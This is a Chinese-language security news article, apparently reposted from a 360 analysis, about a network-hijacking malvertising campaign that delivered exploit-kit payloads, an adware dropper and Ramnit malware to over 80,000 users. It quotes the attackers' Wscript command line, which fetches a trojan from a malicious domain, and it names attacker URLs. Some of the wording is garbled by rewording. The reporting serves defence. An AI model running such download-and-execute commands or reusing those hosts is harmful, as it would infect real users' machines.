2020年7月,爱拍等中国知名论坛。com遭遇大规模挂马,导致敲诈者病原体大张旗鼓的传播。近日,360网络安全中心检测到,爱拍网站挂马的幕后人物再次出招。虽然技巧很相似,但很明显这一次该机构的动作胃口更高——已经不再为一些特殊网站挂马,而是刚开始玩网络劫持,导致河南省某运营商8万多客户被故意推送程序攻击。
因为网络劫持不是针对某个特定网站,很有可能是包括IE电脑浏览器、爱奇艺客户端、迅雷资源、搜狗搜索等所有手机客户端具有显示网页功能的,卷入了这次挂马的恶性事件。7月中下旬挂马实际个人行为详细数据分析报告(http://bobao.360.cn/news/detail/3302.html)。
和之前拍网上挂马的恶性事件类似,这次是用EK(Exploitkits)黑客包来完成挂马的实际 *** 作。从包含恶意代码的Flash动画到免费下载回家故意脚本化的js代码,都和前面的情况很像。唯一的区别是js脚本的命令行参数:
Wscript //B //E:JScript GIF.INJExeCute "gexywoaxor" "http://www.zhongqiulipin.com/svchost.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)"根据js代码,第二个主参数是木马下载链接,第一个主参数是解密密钥。
因为改变了主要参数,木马本身也发生了变化——它不再是杀伤力巨大但“来钱慢”的敲诈者病原体,而变成了简单直接的“赚钱快”的广告程序。
经过编解码后,将样本版本发布到今日客户网站根目录下的“DocumentsandSettings”文件夹下,运行木马前获取任意名称。
木马运行后隐藏自己:
以后打开注册表并将其自身添加为启动项目:
引导完成后,程序将连接到远端网页:
拼凑之后可以看到浏览的网页是:hxxp://b.zhongqiulipin.com/jiating.html,马上打开浏览器看起来更直观:
木马拿到营销目录后,会免费下载运营这个营销程序,赚取佣金。
更极端的是,下载列表中不仅包含具有商业服务营销推广特征的程序,还包含一些带有恶意代码的程序,而碰巧的是,这种恶意代码恰好就是最近流行的Ramnit型木马:
Ramnit木马的明显特点是通道点在an中。带有恶意代码的rmnet段,而且一旦运行,会觉得整个磁盘的程序都可以执行了。详细介绍了该木马的大量分析内容:
http://software.it168.com/a2016/0819/2866/00002866185.shtml
根据360网络安全中心的数据信息,仅昨天(8月23日),被挂马恶性事件伤害的用户已经超过8万人,至今总人数仍在上升。现阶段,360安全卫士已经全面屏蔽挂马个人行为。
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)